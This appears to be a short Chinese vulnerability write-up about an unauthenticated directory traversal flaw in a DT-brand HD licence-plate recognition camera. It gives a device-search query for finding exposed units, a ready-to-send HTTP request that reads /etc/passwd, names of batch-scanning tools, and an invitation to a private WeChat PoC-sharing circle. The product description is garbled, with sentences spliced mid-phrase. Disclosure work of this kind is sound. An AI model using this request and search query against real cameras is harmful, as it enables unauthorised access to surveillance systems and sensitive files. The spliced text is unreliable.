0x01 产品简介

DT-高清 车牌识别摄像机是一款先进的安防设备，采用高清图像传感器和先进的识别算法，能够精准、快速地识别车牌信息。其高清晰该摄像机结合了智能识别技术，支持实时监宴图像质量确保在各种光照和天气条件下都能准确捕捉车牌信息，而且具备远距离识别能力。测和记录车辆进出情况，适用于停车场管理、交通监控等场景，提高了安全性和管理效率。

0x02 漏洞概述

DT-高清车牌识别摄像机存在目录遍历致任意文件读取漏洞，未经身份验证的远程攻击者可以读取系统内部敏感配置文件,
获取服务器信息，导致系统处于极不安全的状态。

0x03 搜索语法

app="DT-高清车牌识别摄像机"

0x04 漏洞复现

GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

0x05 工具批量

nuclei

afrog

xray

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子